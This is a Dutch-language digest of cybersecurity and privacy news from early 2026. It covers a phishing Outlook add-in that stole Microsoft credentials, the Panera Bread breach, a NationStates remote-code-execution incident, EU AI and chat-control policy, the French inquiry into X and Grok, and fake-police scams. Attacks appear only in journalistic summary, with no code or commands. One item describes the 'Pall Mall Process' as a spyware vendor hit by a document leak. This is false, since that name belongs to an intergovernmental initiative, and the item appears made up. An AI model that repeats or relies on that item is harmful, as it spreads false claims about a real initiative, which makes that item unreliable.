Koi onderzoekers ontdekten het misbruik en kregen toegang tot het exfiltratiekanaal van de aanvaller. Ze ontdekten dat meer dan 4.000 Microsoft account credentials waren gestolen, samen met creditcardnummers en bank security antwoorden. De add-in was tot vandaag in de store aanwezig, waarna Microsoft het verwijderde. De onderzoekers van Koi stellen dat de dreigingsactor actief gestolen credentials testte tijdens hun onderzoek. Wanneer gebruikers de kwaadaardige AgreeTo add-in in Outlook openden, zagen ze in plaats van de planningsinterface een valse Microsoft login pagina in de sidebar van het programma, die gemakkelijk te verwarren is met een legitieme login prompt. Alle accountgegevens die daar werden ingevoerd, werden via een Telegram bot API naar de aanvallers geëxfiltreerd, terwijl slachtoffers vervolgens werden doorgestuurd naar de echte Microsoft login pagina om argwaan te verminderen.

De add-in behield ReadWriteItem permissies, waardoor het gebruikersmails kon lezen en wijzigen, hoewel dergelijke activiteit niet is bevestigd. Koi Security ontdekte dat de operator achter deze aanval minstens een dozijn extra phishing kits beheert die gericht zijn op internet service providers, banken en webmail providers. Hoewel kwaadaardige add-ins niet nieuw zijn, zagen we dergelijke tools eerder gepromoot via spam forum comments, phishing emails en malvertising. Het geval van AgreeTo valt echter op, omdat het waarschijnlijk de eerste is die op de Microsoft Marketplace wordt gehost. Koi Security onderzoeker Oren Yomtov vertelde dat dit de eerste malware is die op de officiële Microsoft Marketplace is gevonden en de eerste kwaadaardige Outlook add-in die in het wild is ontdekt. Als u AgreeTo nog steeds op Outlook hebt geïnstalleerd, wordt u aangeraden deze onmiddellijk te verwijderen en uw wachtwoorden opnieuw in te stellen.

Bron: Koi Security | Bron 2: koi.ai | Bron 3: wiz.io | Bron 4: tines.com

▽ JANUARI 2026

Apple introduceert een nieuwe privacyfunctie waarmee gebruikers de precisie van locatiegegevens die met mobiele netwerken worden gedeeld, kunnen beperken op bepaalde iPhone- en iPad-modellen. De instelling "Beperk Precieze Locatie" is beschikbaar na een upgrade naar iOS 26.3 of later. Deze functie beperkt de informatie die mobiele providers gebruiken om de locatie van apparaten te bepalen via verbindingen met zendmasten. Wanneer de functie is ingeschakeld, kunnen mobiele netwerken alleen de geschatte locatie van het apparaat identificeren, bijvoorbeeld een buurt, in plaats van een exact adres.

Apple stelt dat het beperken van de precieze locatie geen invloed heeft op de precisie van de locatiegegevens die worden gedeeld met hulpdiensten tijdens een noodoproep. De instelling beïnvloedt alleen de locatiegegevens die beschikbaar zijn voor mobiele netwerken en heeft geen invloed op de locatiegegevens die gebruikers delen met apps via Locatievoorzieningen, zoals het delen van de locatie met vrienden en familie via "Zoek mijn".

Gebruikers kunnen de functie inschakelen door naar "Instellingen" te gaan, op "Mobiel netwerk" te tikken, vervolgens op "Opties mobiele data" en de instelling "Beperk Precieze Locatie" aan te zetten. Na het inschakelen van de functie kan het systeem vragen om het apparaat opnieuw op te starten om de activering te voltooien.

De privacyverbetering werkt momenteel alleen op iPhone Air, iPhone 16e en iPad Pro (M5) Wi-Fi + Cellular modellen met iOS 26.3 of later. De beschikbaarheid is afhankelijk van de ondersteuning door providers. Momenteel ondersteunde mobiele netwerken zijn onder meer Telekom in Duitsland, EE en BT in het Verenigd Koninkrijk, Boost Mobile in de Verenigde Staten en AIS en True in Thailand.

Hoewel Apple nog niet heeft gedeeld waarom deze functie wordt geïntroduceerd, heeft de Federal Communications Commission (FCC) in april 2024 de grootste Amerikaanse draadloze providers een boete van bijna 200 miljoen dollar opgelegd. De boetes omvatten 80 miljoen dollar voor T-Mobile en 12 miljoen dollar voor Sprint (die inmiddels zijn gefuseerd), meer dan 57 miljoen dollar voor AT&T en bijna 47 miljoen dollar voor Verizon.

Aangezien mobiele netwerken eenvoudig de locatie van apparaten kunnen volgen via zendmastverbindingen voor netwerkoperaties, is de nieuwe privacyfunctie van Apple (momenteel ondersteund door slechts een klein aantal netwerken) een belangrijke stap in de richting van het waarborgen dat providers slechts beperkte gegevens kunnen verzamelen over de bewegingen en gewoonten van hun klanten. BleepingComputer heeft Apple om meer details gevraagd, maar er was nog geen reactie beschikbaar.

Bron

De Amerikaanse restaurantketen Panera Bread is getroffen door een datalek waarbij de persoonlijke gegevens van 5,1 miljoen klanten zijn gelekt. De cybercrimegroep ShinyHunters eiste de aanval op en publiceerde de gestolen data op hun dark web-leksite nadat een poging tot afpersing was mislukt. Oorspronkelijk claimde de groep dat ze data van 14 miljoen klanten hadden buitgemaakt, maar Have I Been Pwned meldt dat het om 5,1 miljoen accounts gaat. De gelekte data bevat namen, adresgegevens, telefoonnummers en e-mailadressen.

ShinyHunters verklaarde tegenover BleepingComputer dat ze toegang kregen tot de systemen van Panera Bread via een Microsoft Entra single sign-on (SSO) code. Deze aanval maakt deel uit van een grotere campagne van ShinyHunters, waarbij ze zich richten op SSO-accounts bij Okta, Microsoft en Google bij meer dan 100 organisaties middels voice phishing (vishing).

Naar aanleiding van het datalek zijn in de Verenigde Staten drie massaclaims gestart. Panera Bread heeft tegenover persbureau Reuters bevestigd dat er contactgegevens zijn buitgemaakt, maar heeft geen details vrijgegeven over hoe de aanval heeft kunnen plaatsvinden. Het bedrijf heeft de autoriteiten op de hoogte gesteld en bevestigd dat "de betrokken gegevens contactinformatie betreffen."

De 5,1 miljoen gestolen e-mailadressen zijn toegevoegd aan de datalekzoekmachine Have I Been Pwned. Uit de analyse blijkt dat 77 procent van de bij Panera Bread buitgemaakte e-mailadressen al eerder in andere datalekken voorkwam die bekend waren bij de zoekmachine. BleepingComputer vond ook meer dan 26.000 unieke panerabread.com e-mailadressen, die waarschijnlijk toebehoren aan Panera Bread-medewerkers.

Als onderdeel van dezelfde reeks vishing-aanvallen heeft ShinyHunters ook online datinggigant Match Group gehackt.

Het spywarebedrijf Pall Mall Process (PMP) staat onder druk nadat interne documenten zijn gelekt die aantonen dat het bedrijf zich bewust is van de reputatieschade die hun activiteiten veroorzaken. De gelekte documenten, die in handen kwamen van The Record, onthullen dat PMP actief werkt aan manieren om hun imago te verbeteren, ondanks de controversiële aard van hun diensten.

PMP verkoopt spyware aan overheden en wetshandhavingsinstanties over de hele wereld. Deze software wordt gebruikt om individuen te bespioneren, vaak zonder hun medeweten of toestemming. Critici beweren dat dit een ernstige inbreuk op de privacy is en kan leiden tot misbruik.

Uit de gelekte documenten blijkt dat PMP zich bewust is van de negatieve publiciteit en de impact daarvan op hun bedrijfsvoering. Het bedrijf heeft intern discussies gevoerd over mogelijke strategieën om de publieke opinie te beïnvloeden en de reputatie te herstellen. Een van de voorgestelde maatregelen is het investeren in public relations en het benadrukken van de vermeende voordelen van hun technologie, zoals het helpen bestrijden van terrorisme en criminaliteit.

De gelekte documenten bevatten ook interne e-mails waarin medewerkers hun bezorgdheid uiten over de ethische implicaties van hun werk. Sommigen stellen dat de spyware te gemakkelijk kan worden misbruikt en dat PMP een verantwoordelijkheid heeft om ervoor te zorgen dat hun technologie niet in verkeerde handen valt.

De onthullingen hebben geleid tot een nieuwe golf van kritiek op PMP en de spyware-industrie in het algemeen. Privacy-advocaten roepen op tot strengere regulering van de verkoop en het gebruik van spyware, en eisen meer transparantie over hoe deze technologie wordt ingezet.

Het is nog onduidelijk welke concrete stappen PMP zal nemen om hun reputatie te verbeteren. De gelekte documenten suggereren dat het bedrijf bereid is aanzienlijke middelen te investeren in public relations en lobbywerk, maar het is de vraag of dit voldoende zal zijn om het vertrouwen van het publiek te herwinnen.

Bron

Een klant van ABN Amro die slachtoffer werd van bankhelpdeskfraude en daardoor ongeveer vijfduizend euro schade leed, krijgt dit bedrag niet vergoed. Dat heeft het financiële klachteninstituut Kifid geoordeeld. De klant werd in april vorig jaar gebeld door een oplichter die zich voordeed als medewerker van de fraudedesk van Geldmaat. De oplichter meldde dat er was geprobeerd om met de pinpas van het slachtoffer een groot geldbedrag op te nemen.

De ABN Amro-klant boekte vervolgens ongeveer vijfduizend euro van haar spaarrekening over naar haar betaalrekening, waarna dit bedrag werd overgemaakt naar een betaalrekening bij ING. Na deze transactie nam het slachtoffer contact op met de fraudeafdeling van ABN Amro om de overboeking te melden. ABN Amro informeerde vervolgens ING en verzocht om het geld veilig te stellen, maar dit lukte ING niet.

Het slachtoffer is van mening dat ABN Amro het schadebedrag moet vergoeden, omdat zij in aanmerking zou komen voor het coulancekader bankhelpdeskfraude. Banken hanteren dit kader om te beoordelen of slachtoffers van bankhelpdeskfraude een vergoeding ontvangen. Een voorwaarde voor vergoeding is dat de oplichter zich voordeed als medewerker van de bank of een gespooft telefoonnummer van de bank gebruikte.

Volgens het slachtoffer is het coulancekader van toepassing, omdat de oplichter zich voordeed als medewerker van Geldmaat, waarvan ABN Amro aandeelhouder is. Daarnaast zou een afwijzing op deze grond niet stroken met de bedoeling van het coulancekader, dat volgens haar is opgesteld om consumenten te compenseren bij misbruik van het vertrouwen in het Nederlandse banksysteem. Het slachtoffer stelt dat ze aan de overige voorwaarden van het coulancekader voldoet.

Het Kifid oordeelt dat coulance niet juridisch afdwingbaar is en dat het in beginsel aan de bank is om te beslissen of schade als gevolg van spoofing wordt vergoed. ABN Amro stelt dat de klant geen beroep kan doen op het coulancekader, omdat er geen sprake is van spoofing van naam en/of telefoonnummer. Het Kifid volgt de bank hierin en wijst de vordering van de ABN Amro-klant af.

Bron

Europese privacytoezichthouders, waaronder de Autoriteit Persoonsgegevens (onderdeel van de EDPB), hebben kritiek geuit op een plan van de Europese Commissie om de AI-regels in de EU te vereenvoudigen. Het plan beoogt het voor AI-bedrijven gemakkelijker te maken om in de EU te opereren en data te gebruiken. De toezichthouders, verenigd in de EDPS en EDPB, stellen dat vereenvoudiging niet ten koste mag gaan van de bescherming van fundamentele rechten.

Een belangrijk punt van kritiek is het voorstel om het gebruik van bijzondere persoonsgegevens, zoals etniciteit of gezondheidsgegevens, voor het opsporen en corrigeren van discriminatie door AI-systemen te verruimen. De EDPB en EDPS zijn van mening dat dit alleen zou mogen in vooraf beschreven situaties waarbij de risico's van discriminatie ernstig genoeg zijn.

De privacytoezichthouders zijn tevens tegen het schrappen van de registratieplicht voor AI-systemen die als hoog-risicovol worden beschouwd, maar waarvan de leverancier zelf inschat dat er geen hoog risico is. Volgens de Autoriteit Persoonsgegevens ondermijnt dit de transparantie en het toezicht, wat misbruik in de hand kan werken. De toezichthouders vrezen dat AI-leveranciers hierdoor ten onrechte kunnen claimen dat hun systemen geen hoog risico vormen om zo toezicht te ontlopen.

Verder benadrukken de EDPB en EDPS dat AI-leveranciers verplicht moeten blijven om te zorgen dat hun personeel voldoende kennis van AI heeft. Ook maken de toezichthouders zich zorgen over het uitstellen van kernverplichtingen voor AI-systemen met een hoog risico en pleiten ze ervoor om deze verplichtingen zo veel mogelijk volgens de oorspronkelijke planning in te voeren.

Bron

De Autoriteit Persoonsgegevens (AP) heeft het tegengaan van massasurveillance in het private en publieke domein als een van haar prioriteiten voor de komende jaren vastgesteld. Dit blijkt uit het Jaarplan 2026 van de privacytoezichthouder. Naast massasurveillance zijn ook AI en digitale weerbaarheid prioriteiten voor de komende drie jaar. Het Jaarplan specificeert de acties die de AP voor deze prioriteiten zal ondernemen.

Volgens de AP maken technologische ontwikkelingen, zoals online surveillance en cameratoezicht, het voor private en publieke organisaties steeds eenvoudiger om mensen systematisch en grootschalig te volgen, zowel online als op straat. De toezichthouder stelt dat dit de persoonlijke autonomie van mensen ernstig beperkt. De AP benadrukt het belang van het blijven toetsen van de inzet van volgmethoden op de wettelijke grondslag en proportionaliteit. De AP stelt dat mensen over straat of op het internet moeten kunnen zonder continu bekeken te worden. De AP wil massasurveillance tegengaan door het brede gebruik van surveillancetechnieken te ontmoedigen. Daarnaast acht de toezichthouder het van belang dat burgers hun persoonlijke vrijheid en autonomie behouden door hen te wijzen op hun rechten en organisaties te wijzen op hun plichten. Het uiteindelijke doel van de AP is het voorkomen van een surveillancemaatschappij waarbinnen kwetsbare groepen verder onder druk komen te staan.

De AP zet tevens meer capaciteit in op het gebied van AI en algoritmes. Dit jaar verschijnt onder meer de visie van de AP op generatieve AI en de AVG-randvoorwaarden. De AP stelt dat het bij AI vaak moeilijker is om achteraf in te grijpen of schade te voorkomen, mede door de snelle technologische ontwikkelingen van AI-systemen. Om de rechten van mensen te borgen, moeten toezichthouders proactief betrokken zijn.

Een derde prioriteit voor de komende drie jaar is digitale weerbaarheid en autonomie. Volgens de AP is het in een periode van instabiliteit op het wereldtoneel belangrijk om afhankelijkheden van onder andere grote technologiebedrijven uit derde landen af te bouwen. De toezichthouder zal het thema autonomie dit jaar ook vanuit technologisch perspectief bekijken, met speciale aandacht voor cloudafhankelijkheden.

Bron

De EU-voorzitter Cyprus wil in juni een Europees akkoord bereiken over chatcontrole. Demissionair minister Van Oosten van Justitie en Veiligheid heeft dit aan de Tweede Kamer laten weten. Eind 2025 stemden de EU-lidstaten voor een Deens voorstel dat de huidige vrijwillige controle door techbedrijven permanent maakt en de mogelijkheid biedt om deze later te verplichten. Het voorstel omvat ook verplichte online leeftijdsverificatie.

Voorstanders benadrukken dat chatcontrole vrijwillig blijft, maar een reviewclausule kan chatcontrole in de toekomst alsnog verplichten. Over drie jaar zal worden gekeken naar de noodzaak en haalbaarheid van detectieverplichtingen, aldus Van Oosten. De Europese Commissie wil chatdiensten verplichten om de inhoud van gebruikersberichten te controleren. Het Europees Parlement verwierp dit voorstel en kwam met een eigen voorstel dat end-to-end versleutelde diensten uitzondert, maar ook op dit voorstel is kritiek.

De EU-lidstaten waren verdeeld over het plan, waardoor onderhandelingen tussen de Europese Commissie, de lidstaten en het Europees Parlement niet mogelijk waren. Nu de lidstaten een positie hebben ingenomen, kunnen de onderhandelingen, ook wel triloog genoemd, beginnen. Het Cypriotische voorzitterschap streeft ernaar om in juni een akkoord te bereiken met het Europees Parlement over de CSAM-Verordening, aldus minister Van Oosten.

In november 2025 nam de Tweede Kamer een motie aan waarin de regering wordt opgeroepen om zich tijdens de onderhandelingen in te zetten om verplichtingen die kunnen leiden tot massasurveillance op versleutelde diensten en onacceptabele cyberveiligheidsrisico's uit het voorstel te verwijderen. GroenLinks-PvdA had de minister gevraagd hoe die de motie zal uitvoeren. Nederland zal zich tijdens de trilogen blijven inzetten binnen de kaders van het kabinetsstandpunt en de door de Kamer aangenomen moties. Zorgen en aandachtspunten die Nederland heeft, zullen dan ook ingebracht worden in bijvoorbeeld de Radengroepen, aldus de minister.

Bron

Mozilla zal Firefox 148 uitrusten met een 'killswitch' om alle AI-functies uit te schakelen. De nieuwe versie van de browser wordt later deze maand verwacht. De aankondiging volgt op de bekendmaking van de nieuwe CEO van Mozilla dat Firefox een "moderne AI-browser" zal worden, wat leidde tot meer dan drieduizend reacties op een Reddit-thread, waar veel gebruikers hun ongenoegen uitten. De CEO benadrukte dat AI altijd een keuze moet zijn.

Het Firefox-ontwikkelteam maakte bekend dat de browser een optie zal krijgen om alle AI-functies uit te schakelen. Intern wordt dit de 'AI-killswitch' genoemd. De ontwikkelaars stellen dat alle AI-functies opt-in zullen zijn, maar dat er 'sommige grijze gebieden' zijn wat 'opt-in' inhoudt. De killswitch moet echter alle AI-functies uitschakelen.

De bètaversie van Firefox 148 bevat de "killswitch", die de naam "Block AI enhancements" heeft gekregen. Met deze functie ingeschakeld, blokkeert de browser vertalingen, chatbots in de zijbalk, suggesties voor tabgroepen en samenvattingen van link previews. Ook extensies die van de Firefox AI-functies gebruikmaken, zullen niet meer werken wanneer de optie is ingeschakeld. Firefox 148 zou op 24 februari moeten uitkomen, aldus Mozilla-volger Sören Hentzschel.

Bron

ProRail gaat dit jaar AI-camera's en drones inzetten voor cameratoezicht langs het spoor. De spoorwegbeheerder maakte dit bekend via de eigen website. In totaal worden 288 bestaande camera's vervangen door AI-camera's. Daarnaast wordt er getest met drones die autonoom opereren en zelf beelden kunnen analyseren. ProRail claimt dat het met AI-camera's sneller kan reageren op gevaarlijke situaties, zoals mensen die op het spoor lopen, koperdiefstallen en stilgevallen voertuigen bij overwegen. De camerabeelden worden 24 uur per dag en zeven dagen per week in de gaten gehouden via een "Smart Monitoring Room".

ProRail zegt ook AI-toepassingen in te zetten om 'ongewenste scenario's' te identificeren. Beeldherkenningssoftware kan bijvoorbeeld detecteren of een persoon of voertuig over een bepaald ‘lijntje’ loopt of stilstaat. De AI kan ook herkennen of die persoon een oranje hesje en helm draagt, wat kan duiden op werkzaamheden.

Dit jaar start ProRail ook met het testen van cameradrones langs het spoor. Deze drones kunnen zelfstandig over een vooraf ingesteld gebied vliegen. Met behulp van AI herkennen ze afwijkingen, zoals openstaande hekken, beschadigde hekwerken of personen op plaatsen waar dat niet mag. Ze kunnen ook aangeven of ergens onderhoud nodig is. ProRail merkt op dat de Nederlandse wet- en regelgeving strenger is dan de Europese, wat het lastig maakt om drones over lange afstanden te laten vliegen.

ProRail zou het aantal AI-camera's langs het spoor willen verdubbelen. Het liefst zouden ze het aantal slimme camera’s minstens verdubbelen en drones inzetten om het spoor veiliger en betrouwbaarder te maken.

Bron

NationStates, een multiplayer browser-based game, heeft een datalek bevestigd en de website offline gehaald na een onderzoek naar een beveiligingsincident. Het spel, ontwikkeld door Max Barry, meldde dat een onbevoegde gebruiker toegang had gekregen tot de productie server en gebruikersdata had gekopieerd.

Op 27 januari 2026 ontdekte een speler een kritieke kwetsbaarheid in de applicatiecode en rapporteerde dit rond 22:00 (UTC). Tijdens het testen van de bug ging de speler verder dan de geautoriseerde grenzen en verkreeg remote code execution (RCE) op de main productie server, waardoor hij applicatiecode en gebruikersdata kon kopiëren.

Volgens Barry heeft deze speler sinds 2021 ongeveer twaalf bug- en kwetsbaarheid rapporten ingediend bij NationStates, met name in de afgelopen zes maanden. De speler was geen staflid en had geen toestemming voor server toegang. Hoewel de persoon in kwestie zich later verontschuldigde en beweerde de data te hebben verwijderd, kan de site dit niet verifiëren en beschouwt het systeem en de data als gecompromitteerd.

Het datalek is ontstaan door een fout in de "Dispatch Search" functie, die op 2 september 2025 werd geïntroduceerd. NationStates meldt dat de aanvaller onvoldoende sanitatie van user-supplied input combineerde met een double-parsing bug, wat resulteerde in een RCE.

De blootgestelde data omvatten:

- Email adressen (inclusief email adressen die in het verleden aan het account waren gekoppeld)

- Wachtwoorden: opgeslagen als MD5 hashes, een verouderd protocol dat niet meer voldoet aan de moderne standaarden en onvoldoende is om decryptie te voorkomen in het geval van een offline kopie van de data.

- IP adressen die gebruikt zijn om in te loggen

- Browser UserAgent strings die gebruikt zijn om in te loggen

- Telegrams data: Hoewel de speler geen toegang kreeg tot de server met telegrams data, maakte hij wel misbruik van de toegang en probeerde hij een deel van de data te kopiëren. NationStates acht het waarschijnlijk dat sommige inhoud is blootgesteld. Een telegram is een intern privé berichtensysteem.

NationStates verzamelt geen echte namen, fysieke adressen, telefoonnummers of creditcard informatie. De website zal naar verwachting binnen twee tot vijf dagen weer online zijn. Zodra de site is hersteld, kunnen gebruikers hun wachtwoorden resetten en de exacte data controleren die voor hun nation is opgeslagen via https://www.nationstates.net/page=private_info.

NationStates heeft het incident gemeld aan de autoriteiten en focust op het volledig opnieuw opbouwen van de productie server op nieuwe hardware, het uitvoeren van security audits en verbeteringen, en het upgraden van de wachtwoord beveiliging.

Bron

Een nieuw sociaal mediaplatform met de naam ‘W’ is aangekondigd als een volledig Europees alternatief voor bestaande netwerken zoals X. De initiatiefnemers beloven dat het platform volledig in Europa wordt gebouwd, beheerd en gehost, waarbij uitsluitend gebruik wordt gemaakt van Europese technologie. Hiermee spelen de makers in op de wens binnen de Europese Unie om technologische soevereiniteit te vergroten en de afhankelijkheid van Amerikaanse technologiebedrijven te verminderen.

Het platform zet specifiek in op privacy en gegevensbescherming door Amerikaanse investeringen af te houden en infrastructuur te gebruiken van Europese partijen, waaronder het Finse UpCloud en het Zwitserse Proton. Een belangrijk motief voor deze opzet is het vermijden van dataopslag op Amerikaanse servers, waardoor gebruikersgegevens buiten het bereik van Amerikaanse wetgeving zoals de Patriot Act en de Cloud Act blijven. W heeft aangegeven zich te conformeren aan de Digital Services Act van de Europese Unie, een wetgevend kader dat platforms verplicht om systeemrisico's te beperken en illegale inhoud actief tegen te gaan.

De organisatie achter W wordt financieel gesteund door Zweedse investeerders en geadviseerd door een raad met diverse bestuurders. In deze adviesraad hebben onder meer de voormalig Duits vicekanselier Philipp Rösler, voorzitter van de Club van Rome Sandrine Dixson-Declève en Cristina Caffara, voorzitter van EuroStack, zitting. Voor de moderatie van content stelt het platform menselijke verificatie, vrijheid van meningsuiting en gegevensprivacy centraal.

Het bestaan van het platform werd bekendgemaakt tijdens het World Economic Forum in Davos. Op dit moment is het platform nog niet volledig openbaar toegankelijk; er is een website gelanceerd waar geïnteresseerden zich voor een wachtlijst kunnen aanmelden. Met de slogan ‘Trust your feed’ poogt het platform zich te onderscheiden op het gebied van betrouwbaarheid van de aangeboden content.

Bron

De nieuwe Nederlandse minderheidsregering heeft plannen bekendgemaakt om de minimumleeftijd voor toegang tot sociale media te verhogen naar vijftien jaar. Uit documenten die vrijdag zijn vrijgegeven blijkt dat de drie partijen achter het voorstel streven naar een handhaafbare Europese minimumleeftijd, gekoppeld aan privacyvriendelijke leeftijdsverificatie voor jongeren. Omdat de partijen gezamenlijk net minder dan de helft van de zetels in het parlement bezitten, is er bredere steun binnen de coalitie nodig om de wetgeving daadwerkelijk door te voeren.

Het voorstel omvat strenger toezicht op grote online platforms. Er worden verplichtingen geïntroduceerd voor transparantie over algoritmen en inkomstenmodellen, evenals effectieve moderatie van illegale content. Volgens de plannen moet strafbare inhoud binnen een uur na een bevel van toezichthouders worden verwijderd. De coalitie wil specifiek verslavende, polariserende en antidemocratische algoritmen verbieden. Daarnaast wordt in de plannen gepleit voor het weren van smartphones uit scholen en het publiceren van richtlijnen voor ouders over de risico's van overmatig schermgebruik.

Deze stap volgt op vergelijkbare initiatieven in andere Europese landen. Franse wetgevers hebben recent ingestemd met een verbod voor kinderen onder de vijftien jaar, dat in september van kracht wordt. De Britse regering kondigde op 19 januari aan te overwegen sociale media te verbieden voor kinderen onder de zestien jaar, waarbij premier Keir Starmer wees op de druk die online platforms op kinderen leggen. Australië was het eerste land dat een dergelijk verbod invoerde; sinds de inwerkingtreding in december hebben sociale mediabedrijven daar tot 16 januari ongeveer 4,7 miljoen accounts gedeactiveerd die werden geïdentificeerd als toebehorend aan kinderen.
Bron

Franse aanklagers hebben op dinsdag de kantoren van X in Parijs doorzocht in verband met een strafrechtelijk onderzoek naar de Grok AI-tool van het platform en vermeende algoritme-manipulatie. Het onderzoek, dat in januari 2025 werd geopend, is uitgebreid na klachten over Grok die illegale inhoud genereert en X dat wordt gebruikt om seksuele deepfakes en Holocaust-ontkenningscontent te delen. De zoekactie werd uitgevoerd door agenten van de cybercrime-eenheid van de Nationale Gendarmerie, met assistentie van Europol-functionarissen.

Het parket van Parijs heeft Elon Musk en Linda Yaccarino, CEO van X tussen 2023 en 2025, opgeroepen voor vrijwillige interviews op 20 april in verband met het onderzoek. Tussen 20 en 24 april zullen ook andere X-medewerkers als getuigen worden ondervraagd. De vrijwillige interviews zouden de leidinggevenden in staat moeten stellen hun standpunt over de feiten te presenteren en, waar van toepassing, de beoogde compliance-maatregelen toe te lichten.

De cybercrime-afdeling onderzoekt zeven strafbare feiten, waaronder medeplichtigheid aan het bezit en de verspreiding van kinderpornografie, overtredingen met betrekking tot seksuele deepfakes, Holocaust-ontkenning, frauduleuze data-extractie, systeemmanipulatie en het exploiteren van een illegaal online platform als onderdeel van een georganiseerde criminele organisatie.

Het onderzoek richt zich op twee eerdere klachten uit januari 2025. De eerste klacht werd ingediend door het Franse parlementslid Eric Bothorel, die stelt dat het X-algoritme gebruikt kan worden voor "buitenlandse inmenging". Bothorel waarschuwde voor een "afname van de diversiteit aan stemmen" sinds de overname door Elon Musk in 2022, waardoor een veilige en respectvolle omgeving niet meer zou worden gegarandeerd. De tweede klacht zou zijn ingediend door een directeur cyberbeveiliging bij de overheid, die meldde dat een enorme hoeveelheid haatdragende, racistische, anti-lhbtqia+ en politieke inhoud wordt aangeboden, die gericht zou zijn op het sturen van het democratische debat in Frankrijk.

De Europese Commissie startte in januari 2026 een eigen onderzoek om na te gaan of X de risico's onder de Digital Services Act naar behoren heeft beoordeeld voordat het de Grok-tool voor kunstmatige intelligentie inzette. De Europese Commissie is zelfs een gerechtelijke procedure gestart om een verbod op Grok binnen de EU af te dwingen. X wordt ook onderzocht door Ofcom en het Office of California Attorney General Rob Bonta over seksueel expliciet materiaal zonder toestemming dat is gegenereerd met behulp van Grok. De Europese Commissie legde X in december een boete op van €120 miljoen wegens schendingen van de transparantieverplichtingen onder de Digital Services Act (DSA).

Het Global Government Affairs-account van X beschreef het onderzoek van de Franse autoriteiten naar vermeende algoritmemanipulatie en vermeende "frauduleuze data-extractie" eerder als "een politiek gemotiveerd strafrechtelijk onderzoek." Het Franse openbaar ministerie heeft laten weten dat het niet langer actief zal zijn op X en voortaan LinkedIn en Instagram zal gebruiken voor communicatie.

In 2025 registreerde de politie 13.000 incidenten met nepagenten in Nederland. Hoewel het aantal incidenten de laatste maanden stabiliseert, blijft de financiële en emotionele impact op slachtoffers, met name 70-plussers, aanzienlijk. Sybren van der Velden Walda, landelijk projectleider Senioren en Veiligheid, benadrukt het belang van waarschuwingen tegen deze vorm van georganiseerde criminaliteit. De politie schrijft de stabilisatie mede toe aan de toegenomen media-aandacht, waaronder een campagne met Omroep Max onder het motto: "Is het een nepagent of is het oké? Check het via 112!"

Op maandagavond 2 februari 2026 is een 83-jarige vrouw in Terneuzen slachtoffer geworden van diefstal door personen die zich voordeden als politieagenten. Het incident vond plaats in de Nassaustraat, waarbij de vrouw werd opgebeld door iemand die zich voordeed als een politieagent. Kort daarna verscheen er een vrouw aan haar deur. Het slachtoffer voelde zich overvallen en liet de vrouw binnen, waarna de verdachte naar haar sieraden vroeg en deze ontvreemde. Na de diefstal werd direct 112 gebeld. De politie heeft een Burgernet-bericht verzonden en buurtbewoners gevraagd uit te kijken naar de verdachten: twee vrouwen, waarvan één ongeveer 35 jaar oud met een lichte huidskleur, blond lang haar, een normaal postuur en een zwart fleecejack.

De politie heeft het noodnummer 112 ter beschikking gesteld voor verificatie. Meldkamers hebben een toename in het aantal telefoontjes over vermeende nepagenten geconstateerd. Criminelen opereren vaak in specifieke gemeenten in de namiddag en vroege avond, waarbij ze vanuit callcenters senioren tegelijkertijd bellen. Loopjongens staan paraat om waardevolle spullen op te halen als slachtoffers in de truc trappen. Burgernet wordt ingezet om mensen te waarschuwen zodra de politie dergelijke activiteiten opmerkt.

De werkwijze van de criminelen is geëvolueerd. Ze houden slachtoffers nu zo lang mogelijk aan de lijn om de druk te handhaven en te voorkomen dat ze contact opnemen met familie of buren. Naast sieraden richten de criminelen zich nu ook op bankpasjes. Slachtoffers worden zogenaamd doorverbonden met de bank, waarbij hen wordt verteld dat er iets mis is met hun bankpas en hun pincode nodig is, wat tot aanzienlijke financiële schade leidt.

In 2025 zijn meer dan zeshonderd mensen aangehouden voor dit delict en zijn er zevenhonderd aangeleverd aan het Openbaar Ministerie. De politie richt zich op het aanpakken van de facilitators en heeft de informatievoorziening landelijk verbeterd om verbanden te leggen en onderzoeksteams samen te brengen. De politie benadrukt dat zij nooit zullen vragen om waardevolle spullen, bankpassen of pincodes, en ook geen persoonlijke documenten meenemen uit voorzorg. Bij twijfel wordt geadviseerd om 112 te bellen. Slachtoffers van nepagenten hoeven zich niet te schamen, omdat de criminelen zeer geraffineerd te werk gaan. Getuigen van het incident in Terneuzen kunnen contact opnemen via 0900-8844 of anoniem via Meld Misdaad Anoniem op 0800-7000.
Bron

De Nederlandse overheid gaat een alternatief voor Teams, Zoom en Webex testen. Dit alternatief is ontwikkeld door de Franse overheid. Demissionair staatssecretaris Van Marum voor Digitalisering heeft dit bekendgemaakt. De Franse videovergadertool, genaamd Visio, wordt al gebruikt door tienduizenden Franse ambtenaren. De Franse overheid maakte onlangs bekend dat de tool verder zal worden verspreid onder tweehonderdduizend ambtenaren.

Tijdens een overleg van de vaste commissie voor Digitale Zaken van de Tweede Kamer kwam de Franse videovergadertool ter sprake. GroenLinks-PvdA-Kamerlid Kathmann vroeg aan staatssecretaris Van Marum of Nederland het voorbeeld van Frankrijk kan volgen. Kathmann stelde de vraag wat er in de weg staat om op korte termijn de gevoeligste delen van de Nederlandse ICT, namelijk communicatie en opslag, bij Nederlandse en Europese bedrijven onder te brengen.

Staatssecretaris Van Marum antwoordde dat de Nederlandse overheid, net als Frankrijk, onderzoek doet naar autonome communicatiemiddelen voor chats en videovergaderen. Er worden momenteel pilots opgezet met de tools die ook in Frankrijk worden gebruikt, om te onderzoeken en te waarborgen dat implementaties voldoen aan de Nederlandse wetgeving en richtlijnen op het gebied van onder meer cybersecurity en de Wet open overheid. Voor videovergaderen worden pilots opgezet met de Franse vergadertool Visio en met de videovergaderfunctie Nextcloud.

Van Marum voegde eraan toe dat voor chatfunctionaliteit wordt gekeken naar opensource-oplossingen. Er wordt ook getoetst of de videovergadertool bijvoorbeeld kan aansluiten op de verschillende fysieke vergaderruimten van de Rijksoverheid over het hele land. Nederland is met Frankrijk in contact over het onderbrengen van de gevoeligste ICT-delen bij binnenlandse bedrijven. Volgens de staatssecretaris is de inkooptechniek niet het grootste probleem, maar de gevolgen voor het primaire proces als een aanbesteding wordt ingetrokken of een contract wordt opgezegd. Hij merkte op dat er niet altijd alternatieven voorhanden zijn.
Bron

Spanje gaat een leeftijdsverbod en leeftijdsverificatie voor social media invoeren. De Spaanse premier Sánchez kondigde dit aan tijdens de World Governments Summit in Dubai. Het verbod geldt voor gebruikers onder de 16 jaar. Socialmediaplatforms worden verplicht om "effectieve leeftijdsverificatiesystemen" in te voeren.

